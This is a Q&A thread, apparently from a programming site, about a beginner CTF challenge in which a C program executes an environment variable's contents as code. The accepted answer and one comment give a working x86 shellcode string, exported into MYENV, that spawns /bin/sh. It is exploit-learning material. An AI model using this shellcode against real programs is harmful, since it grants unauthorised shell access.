# Segmentation fault on trying to execute value at environment variable

Tags: c, linux, shell, terminal

Hey so I was trying to solve a problem for beginners ctf event.

And this is the code that I am trying to run.

```
#include <stdio.h>
#include <stdlib.h>

int main(){
            int (*func)();
            func = getenv("MYENV");
            func();
            return 0;
}
```

I created a MYENV environment like this :

`export MYENV=ls`

but on running the code, it throws a `segmentation fault (core dumped)`. I don't understand why.

The func function is basically calling the environment variable whose value is a simple command that I set. Why is it throwing an error.

I'm very new at linux and shell, so I'm sorry if this is too naive.

Comment: I think you need to do some reading and understand how C code is translated into assembly code, and then assembled to binary machine code. Then you'll understand why telling the CPU to execute the bytes `ls` will never work.

Comment: @JonathonReinhart can you point me to some resource please? Thanks in advance.

Comment: @aroma : `getenv` returns a pointer to the string which holds the environment variable, in your case a sequence of bytes `'l','s',0`. You store this pointer in the variable `func`. Then you do a `func()`, which basically tells C to use the address as a set of machine instructions to be executed. The address fortunately does point to meaningful machine code and hence you get a SIGSEGV.

Comment: hey @user1934428 I kind of understand what you're saying but what does `The address fortunately does point to meaningful machine code` mean. did you mean `does not`

Comment: @aroma : Thank you, my fingers were quicker than my brain. Of course I meant "does not".

Answer (score 3, accepted):

In C, if you want to run a system command, you have to use the `system` function (or one of the [exec](https://www.geeksforgeeks.org/exec-family-of-functions-in-c/) functions but that's more complicated):

```c
#include <stdio.h>
#include <stdlib.h>

int main() {
    char* cmd = getenv("MYENV");
    system(cmd);
    return 0;
}
```

If you're looking to run arbitrary code, you can inject shell code into it:

```
export MYENV=$'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'
```

You can learn more [here](https://www.youtube.com/watch?v=Nn0fUJuQEsk).

Comment: actually this isn't my code. I can't make changes in the code.

Comment: Oh it's a pwn challenge. In this case, you want to load some shellcode into the environment variable to get a shell, like `export MYENV=$'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'`. Learn more [here](https://www.youtube.com/watch?v=Nn0fUJuQEsk).

Comment: hey that's exactly what I was looking for can you edit that in the answer so I can accept?